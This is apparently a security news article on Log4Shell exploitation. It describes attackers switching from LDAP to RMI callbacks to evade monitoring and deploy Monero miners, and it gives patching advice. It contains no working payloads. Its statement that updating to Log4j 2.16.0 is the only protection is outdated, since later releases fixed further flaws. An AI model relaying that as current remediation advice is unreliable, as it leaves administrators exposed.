For optimum success, some threat actors using the Apache Log4j vulnerability have shifted from LDAP callback URLs to RMI or even combined the two in a single request. This move is an essential step in the ongoing attack that defenders should be aware of when securing all possible channels. For the time being, threat actors aiming to hijack resources for Monero mining have noticed this pattern, but others might follow suit at any time.
The LDAP (Lightweight Directory Access Protocol) service has been used in most attacks targeting the Log4j “Log4Shell” vulnerability. Switching to the RMI (Remote Method Invocation) API may appear counterintuitive at first, given that this approach is subject to extra checks and limitations. However, this isn’t always the case.
Because some JVM (Java Virtual Machine) versions do not have strict rules, RMI might be a more convenient way to do RCE (Remote Code Execution) than LDAP. Furthermore, LDAP queries are now firmly established as part of the infection chain, and defenders monitor them more closely.
In attacks witnessed by Juniper Labs, threat actors are interested in mining Monero on hacked servers. They portray it as a relatively harmless activity that will cause no harm to others. The miner is designed for x84_64 Linux computers and uses the cron subsystem to enable durability. Although most cyberattacks have so far targeted Linux systems, CheckPoint claims to have uncovered the first Win32 program that uses Log4Shell, known as ‘StealthLoader.’
The only way to protect yourself from one of the most severe vulnerabilities in recent memory is to update Log4j to version 2.16.0. Admins should also watch Apache’s security section for new version announcements and implement them as soon as possible. Check out CISA’s detailed page on Log4Shell for mitigation advice and extensive technical knowledge resources.
CVE-2021-44228 affects a wide range of products, and a list of vendor-supplied warnings is continually updated on this GitHub repository. Finally, if you see strange activity on your systems, contact the FBI or CISA.